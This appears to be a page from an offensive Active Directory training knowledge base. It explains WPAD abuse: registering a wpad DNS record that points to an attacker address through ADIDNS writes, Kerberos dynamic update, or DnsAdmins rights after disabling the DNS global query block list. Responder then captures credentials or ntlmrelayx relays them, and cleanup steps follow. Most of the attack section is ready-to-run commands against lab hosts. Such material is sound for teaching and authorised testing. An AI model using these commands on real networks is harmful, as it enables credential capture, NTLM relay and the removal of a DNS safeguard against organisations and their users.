Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / DNS / WPAD

Attack

WPAD abuse turns name resolution into proxy auto-discovery control. If clients ask for wpad.domain.local and we make that name resolve to us, browsers and services may connect to our listener and authenticate. This becomes capture or relay depending on the listener.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'

Check whether WPAD already exists

dig @$DC wpad.$DOMAIN A +short
nslookup wpad.$DOMAIN $DC

Add WPAD with ADIDNS write

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record wpad --data $ATTACKER $DC
dig @$DC wpad.$DOMAIN A +short

Add WPAD with Kerberos dynamic update

nsupdate -g
server 10.10.10.200
zone ootw.local
update add wpad.ootw.local 60 A 10.10.10.100
send
quit

Start capture

sudo responder -I eth0 -w

Start relay instead of capture

ntlmrelayx.py -tf targets.txt -smb2support -wh wpad.ootw.local

If Responder is also used for poisoning, disable its SMB and HTTP listeners so they do not bind the same ports as ntlmrelayx.py.

DnsAdmins path when WPAD is blocked

Get-DnsServerGlobalQueryBlockList -ComputerName dc01.ootw.local
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.ootw.local
Add-DnsServerResourceRecordA -Name wpad -ZoneName ootw.local -ComputerName dc01.ootw.local -IPv4Address 10.10.10.100

Verify from Windows

nslookup wpad.ootw.local 10.10.10.200
curl http://wpad.ootw.local/wpad.dat

Delete ADIDNS WPAD

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record wpad $DC

Delete with PowerShell and restore block list

Remove-DnsServerResourceRecord -Name wpad -ZoneName ootw.local -ComputerName dc01.ootw.local -RRType A -Force
Set-DnsServerGlobalQueryBlockList -Enable $true -ComputerName dc01.ootw.local
Set-DnsServerGlobalQueryBlockList -List wpad,isatap -ComputerName dc01.ootw.local
Get-DnsServerGlobalQueryBlockList -ComputerName dc01.ootw.local

Notes

WPAD is high-impact because clients may ask for it automatically.
Modern environments often block WPAD at DNS through the global query block list.
DnsAdmins can remove that block and add the record.
WPAD does not guarantee credentials by itself. The client must connect, the listener must answer, and the authentication path must be accepted.
Relay value depends on the target protections, not on WPAD alone.